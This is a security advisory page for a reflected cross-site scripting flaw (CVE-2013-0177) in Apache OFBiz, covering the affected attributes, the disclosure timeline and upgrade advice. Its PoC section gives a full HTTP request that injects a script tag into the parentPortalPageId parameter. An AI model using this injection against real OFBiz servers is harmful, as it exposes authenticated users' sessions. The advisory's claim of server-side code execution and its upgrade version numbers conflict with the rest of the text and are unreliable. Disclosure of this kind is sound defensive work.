seeing is believing

Apache OFBiz Cross Site Scripting

Apache OFBiz Cross Site Scripting
Posted Jan 20, 2013
Authored by Marcos Garcia, Juan Caillava

Apache OFBiz versions 10.04.05 and below and 11.04.01 and below suffer from a reflected cross site scripting vulnerability. Full exploitation details provided.

tags | exploit, xss
advisories | CVE-2013-0177
MD5 | 061d43f6b1f8df0846bc859235dda908

Apache OFBiz Cross Site Scripting

Change Mirror Download
Title: Cross-Site Scripting (XSS) Vulnerability in Apache OFBiz
Type: Remote
Author: Juan Caillava (@jcaillava) / Marcos Garcia (@artsweb)
CVE: CVE-2013-0177
Impact: Direct execution of arbitrary code in the context of Webserver user.
Release Date: 18.01.2013

Summary
=======

Apache Open For Business (Apache OFBiz) is an open source enterprise
resource planning (ERP) system. It provides a suite of enterprise
applications that integrate and automate many of the business processes of
an enterprise.

Description
===========

Reflected Cross-Site Scripting Vulnerability affecting Screenlet.title and
Image.alt Widget attributes because the content of these two elements is
not properly escaped.


Vendor
======

Apache ofbiz - http://ofbiz.apache.org/


PoC
===

It is worth mentioning that originally the resource was using the HTTP
method POST, but it was changed to GET to exploit it more easily.
Something important to remark is that for this attack to work, the victim
should be authenticated.

Below you can see how the URL is specially crafted to expose the issue:

Affected URL: https://10.10.10.14:8443/exampleext/control/ManagePortalPages->
parameter: parentPortalPageId==[XSS]

GET
/exampleext/control/ManagePortalPages?parentPortalPageId=EXAMPLE"><script>alert("xss")</script>
HTTP/1.1
Host: 10.10.10.14:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101
Firefox/17.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ar,es;q=0.8,en-us;q=0.5,en;q=0.3
Connection: keep-alive
Referer:
https://10.10.10.14:8443/exampleext/control/main?externalLoginKey=EL367731470037
Cookie: JSESSIONID=C3E2C59FDC670DC004A562861681C092.jvm1;
OFBiz.Visitor=10002


Solution
========

10.04.* users should upgrade to 10.04.05
11.04.01 users should upgrade to 11.04.02


Vendor Status
=============

[08.01.2013] Vulnerability discovered.
[09.01.2013] Vendor informed.
[09.01.2013] Vendor replied.
[12.01.2013] Vendor reveals patch release date.
[18.01.2013] Public advisory.

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

July 2017

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    2 Files
  • 2
    Jul 2nd
    3 Files
  • 3
    Jul 3rd
    15 Files
  • 4
    Jul 4th
    4 Files
  • 5
    Jul 5th
    15 Files
  • 6
    Jul 6th
    15 Files
  • 7
    Jul 7th
    10 Files
  • 8
    Jul 8th
    2 Files
  • 9
    Jul 9th
    10 Files
  • 10
    Jul 10th
    15 Files
  • 11
    Jul 11th
    15 Files
  • 12
    Jul 12th
    19 Files
  • 13
    Jul 13th
    16 Files
  • 14
    Jul 14th
    15 Files
  • 15
    Jul 15th
    3 Files
  • 16
    Jul 16th
    2 Files
  • 17
    Jul 17th
    8 Files
  • 18
    Jul 18th
    11 Files
  • 19
    Jul 19th
    15 Files
  • 20
    Jul 20th
    15 Files
  • 21
    Jul 21st
    15 Files
  • 22
    Jul 22nd
    7 Files
  • 23
    Jul 23rd
    2 Files
  • 24
    Jul 24th
    19 Files
  • 25
    Jul 25th
    28 Files
  • 26
    Jul 26th
    2 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close